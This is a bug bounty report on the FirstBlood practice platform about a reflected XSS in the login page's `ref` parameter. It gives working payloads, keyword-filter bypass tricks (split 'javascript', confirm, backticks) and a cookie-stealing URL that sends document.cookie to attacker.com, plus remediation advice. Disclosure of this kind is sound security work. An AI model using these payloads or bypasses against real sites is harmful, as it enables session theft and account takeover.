FirstBlood-#154 — Reflective XSS on /login.php endpoint through the vulnerable `ref` parameter
This issue was discovered on FirstBlood v1
On 2021-05-10, holybugx Level 5 reported:
Description
Hello Sean,
I found out that there is a reflected XSS on the /login.php
endpoint through the vulnerable ref
parameter which leads to account takeover.
Steps to reproduce
- Open the following link:
http://firstbloodhackers.com/login.php?action=login&ref=ja%09vascript:confirm`1`
- Click on the
Return to previous page
and the XSS pops-up:
Filter bypass
I found out that certain keywords are being blocked and removed, I realized javascript
keyword is being removed so I tried couple of encoding tricks such as java%09script
but then I realized using this payload java
keyword is removed, also realized alert
keyword and (
are being removed.
I used the following tricks to bypass the filtering:
javascript
--> ja%09vascript
alert
--> confirm
( )
--> ``
Bypass explanation
- You can use multiple encoding/unicoding tricks to bypass the
javascript
keyword being removed, an example of such is:
ja%09vascript
ja%0avascript
ja%0dvascript
-
You can use confirm
or prompt
if keywords such as alert
is blocked.
-
When parentheses are filtered you can either use ` `
as I did, or in some cases you can use encoding tricks such as HTML encode or URL encoding/Double URL encoding.
confirm(1) --> confirm`1`
Exploitation
An attacker can craft a payload to steal cookies, an example of such payload is:
http://firstbloodhackers.com/login.php?ref=ja%09vascript:window.location.href=%60http://attacker.com/$%7Bdocument.cookie%7D%60
Where http://attacker.com
is the attacker's domain, opening the above link and clicking on the Return to previous page
results in a redirection to the attacker's domain and the cookies will be sent to the attacker's server.
An attacker can set this cookie on his browser to access drAdmin
(Administrator).
This happens because of two cookies misconfiguration:
-
Cookies are not set as httponly
which makes it possible for an attacker to steal cookies using javascript.
-
Cookies are not deleted/expired as they meant to be after logging out, which makes it possible for an attacker to re-use the cookies whenever he wants to.
Set-Cookie: drps=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
Remediation
- The
ref
parameter should not be controlled by users.
- Preferably set
httponly
cookies so that javascript can not be used to steal cookies.
Impact
- Account takeover
Best regards,
HolyBugx
P3 Medium
Parameter:
Payload:
FirstBlood ID: 3
Vulnerability Type: Reflective XSS
The parameter "ref" is vulnerable to XSS on login.php. The developer has tried to prevent a malicious actor from redirecting to a javascript URI but the attempt to stop this was poor and thus it can be bypassed.